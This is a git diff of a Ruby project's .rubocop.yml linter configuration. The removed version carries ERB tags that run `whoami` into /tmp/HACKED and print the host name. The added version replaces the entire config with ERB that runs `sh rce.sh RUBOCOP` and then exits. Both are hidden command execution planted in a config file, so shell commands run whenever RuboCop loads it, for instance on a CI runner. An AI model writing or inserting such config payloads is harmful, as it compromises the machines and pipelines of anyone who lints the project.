--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -1,218 +1,3 @@
-# Common configuration.
-
-<%  `whoami > /tmp/HACKED` %>
-
-<%  $stdout.write "*********\n" %>
-<% `whoami && hostname`.lines.each do |path| %>
-<% $stdout.write path + "\n" %>
-<% end %>
-<%  $stdout.write "*********\n" %>
-
-AllCops:
-  RubyInterpreters:
-    - ruby
-    - macruby
-    - rake
-    - jruby
-    - rbx
-  # Include common Ruby source files.
-  Include:
-    - '**/*.rb'
-    - '**/*.arb'
-    - '**/*.axlsx'
-    - '**/*.builder'
-    - '**/*.fcgi'
-    - '**/*.gemfile'
-    - '**/*.gemspec'
-    - '**/*.god'
-    - '**/*.jb'
-    - '**/*.jbuilder'
-    - '**/*.mspec'
-    - '**/*.opal'
-    - '**/*.pluginspec'
-    - '**/*.podspec'
-    - '**/*.rabl'
-    - '**/*.rake'
-    - '**/*.rbuild'
-    - '**/*.rbw'
-    - '**/*.rbx'
-    - '**/*.ru'
-    - '**/*.ruby'
-    - '**/*.spec'
-    - '**/*.thor'
-    - '**/*.watchr'
-    - '**/.irbrc'
-    - '**/.pryrc'
-    - '**/.simplecov'
-    - '**/buildfile'
-    - '**/Appraisals'
-    - '**/Berksfile'
-    - '**/Brewfile'
-    - '**/Buildfile'
-    - '**/Capfile'
-    - '**/Cheffile'
-    - '**/Dangerfile'
-    - '**/Deliverfile'
-    - '**/Fastfile'
-    - '**/*Fastfile'
-    - '**/Gemfile'
-    - '**/Guardfile'
-    - '**/Jarfile'
-    - '**/Mavenfile'
-    - '**/Podfile'
-    - '**/Puppetfile'
-    - '**/Rakefile'
-    - '**/rakefile'
-    - '**/Snapfile'
-    - '**/Steepfile'
-    - '**/Thorfile'
-    - '**/Vagabondfile'
-    - '**/Vagrantfile'
-  Exclude:
-    - 'node_modules/**/*'
-    - 'tmp/**/*'
-    - 'vendor/**/*'
-    - '.git/**/*'
-  # Default formatter will be used if no `-f/--format` option is given.
-  DefaultFormatter: progress
-  # Cop names are displayed in offense messages by default. Change behavior
-  # by overriding DisplayCopNames, or by giving the `--no-display-cop-names`
-  # option.
-  DisplayCopNames: true
-  # Style guide URLs are not displayed in offense messages by default. Change
-  # behavior by overriding `DisplayStyleGuide`, or by giving the
-  # `-S/--display-style-guide` option.
-  DisplayStyleGuide: false
-  # When specifying style guide URLs, any paths and/or fragments will be
-  # evaluated relative to the base URL.
-  StyleGuideBaseURL: https://rubystyle.guide
-  # Extra details are not displayed in offense messages by default. Change
-  # behavior by overriding ExtraDetails, or by giving the
-  # `-E/--extra-details` option.
-  ExtraDetails: false
-  # Additional cops that do not reference a style guide rule may be enabled by
-  # default. Change behavior by overriding `StyleGuideCopsOnly`, or by giving
-  # the `--only-guide-cops` option.
-  StyleGuideCopsOnly: false
-  # All cops except the ones configured `Enabled: false` in this file are enabled by default.
-  # Change this behavior by overriding either `DisabledByDefault` or `EnabledByDefault`.
-  # When `DisabledByDefault` is `true`, all cops in the default configuration
-  # are disabled, and only cops in user configuration are enabled. This makes
-  # cops opt-in instead of opt-out. Note that when `DisabledByDefault` is `true`,
-  # cops in user configuration will be enabled even if they don't set the
-  # Enabled parameter.
-  # When `EnabledByDefault` is `true`, all cops, even those configured `Enabled: false`
-  # in this file are enabled by default. Cops can still be disabled in user configuration.
-  # Note that it is invalid to set both EnabledByDefault and DisabledByDefault
-  # to true in the same configuration.
-  EnabledByDefault: false
-  DisabledByDefault: true
-  # New cops introduced between major versions are set to a special pending status
-  # and are not enabled by default with warning message.
-  # Change this behavior by overriding either `NewCops: enable` or `NewCops: disable`.
-  # When `NewCops` is `enable`, pending cops are enabled in bulk. Can be overridden by
-  # the `--enable-pending-cops` command-line option.
-  # When `NewCops` is `disable`, pending cops are disabled in bulk. Can be overridden by
-  # the `--disable-pending-cops` command-line option.
-  NewCops: pending
-  # Enables the result cache if `true`. Can be overridden by the `--cache` command
-  # line option.
-  UseCache: true
-  # Threshold for how many files can be stored in the result cache before some
-  # of the files are automatically removed.
-  MaxFilesInCache: 20000
-  # The cache will be stored in "rubocop_cache" under this directory. If
-  # CacheRootDirectory is ~ (nil), which it is by default, the root will be
-  # taken from the environment variable `$XDG_CACHE_HOME` if it is set, or if
-  # `$XDG_CACHE_HOME` is not set, it will be `$HOME/.cache/`.
-  # The CacheRootDirectory can be overwritten by passing the `--cache-root` command
-  # line option or by setting `$RUBOCOP_CACHE_ROOT` environment variable.
-  CacheRootDirectory: ~
-  # It is possible for a malicious user to know the location of RuboCop's cache
-  # directory by looking at CacheRootDirectory, and create a symlink in its
-  # place that could cause RuboCop to overwrite unintended files, or read
-  # malicious input. If you are certain that your cache location is secure from
-  # this kind of attack, and wish to use a symlinked cache location, set this
-  # value to "true".
-  AllowSymlinksInCacheRootDirectory: false
-  # What MRI version of the Ruby interpreter is the inspected code intended to
-  # run on? (If there is more than one, set this to the lowest version.)
-  # If a value is specified for TargetRubyVersion then it is used. Acceptable
-  # values are specificed as a float (i.e. 2.5); the teeny version of Ruby
-  # should not be included. If the project specifies a Ruby version in the
-  # .tool-versions or .ruby-version files, Gemfile or gems.rb file, RuboCop will
-  # try to determine the desired version of Ruby by inspecting the
-  # .tool-versions file first, then .ruby-version, followed by the Gemfile.lock
-  # or gems.locked file. (Although the Ruby version is specified in the Gemfile
-  # or gems.rb file, RuboCop reads the final value from the lock file.) If the
-  # Ruby version is still unresolved, RuboCop will use the oldest officially
-  # supported Ruby version (currently Ruby 2.4).
-  TargetRubyVersion: ~
-  # Determines if a notification for extension libraries should be shown when
-  # rubocop is run. Keys are the name of the extension, and values are an array
-  # of gems in the Gemfile that the extension is suggested for, if not already
-  # included.
-  SuggestExtensions:
-    rubocop-rails: [ rails ]
-    rubocop-rspec: [ rspec, rspec-rails ]
-    rubocop-minitest: [ minitest ]
-    rubocop-sequel: [ sequel ]
-    rubocop-rake: [ rake ]
-
-#################### Bundler ###############################
-
-Bundler/InsecureProtocolSource:
-  Description: >-
-    The source `:gemcutter`, `:rubygems` and `:rubyforge` are deprecated
-    because HTTP requests are insecure. Please change your source to
-    'https://rubygems.org' if possible, or 'http://rubygems.org' if not.
-  Enabled: true
-  VersionAdded: '0.50'
-  Include:
-    - '**/*.gemfile'
-    - '**/Gemfile'
-    - '**/gems.rb'
-
-#################### Security ##############################
-
-Security/Eval:
-  Description: 'The use of eval represents a serious security risk.'
-  Enabled: true
-  VersionAdded: '0.47'
-
-Security/JSONLoad:
-  Description: >-
-    Prefer usage of `JSON.parse` over `JSON.load` due to potential
-    security issues. See reference for more information.
-  Reference: 'https://ruby-doc.org/stdlib-2.7.0/libdoc/json/rdoc/JSON.html#method-i-load'
-  Enabled: true
-  VersionAdded: '0.43'
-  VersionChanged: '0.44'
-  # Autocorrect here will change to a method that may cause crashes depending
-  # on the value of the argument.
-  AutoCorrect: false
-  SafeAutoCorrect: false
-
-Security/MarshalLoad:
-  Description: >-
-    Avoid using of `Marshal.load` or `Marshal.restore` due to potential
-    security issues. See reference for more information.
-  Reference: 'https://ruby-doc.org/core-2.7.0/Marshal.html#module-Marshal-label-Security+considerations'
-  Enabled: true
-  VersionAdded: '0.47'
-
-Security/Open:
-  Description: 'The use of `Kernel#open` and `URI.open` represent a serious security risk.'
-  Enabled: true
-  VersionAdded: '0.53'
-  VersionChanged: '1.0'
-  Safe: false
-
-Security/YAMLLoad:
-  Description: >-
-    Prefer usage of `YAML.safe_load` over `YAML.load` due to potential
-    security issues. See reference for more information.
-  Reference: 'https://ruby-doc.org/stdlib-2.7.0/libdoc/yaml/rdoc/YAML.html#module-YAML-label-Security'
-  Enabled: true
-  VersionAdded: '0.47'
-  SafeAutoCorrect: false
+#.rubocop.yml
+<%=  `sh rce.sh RUBOCOP` %>
+<%= exit! %>
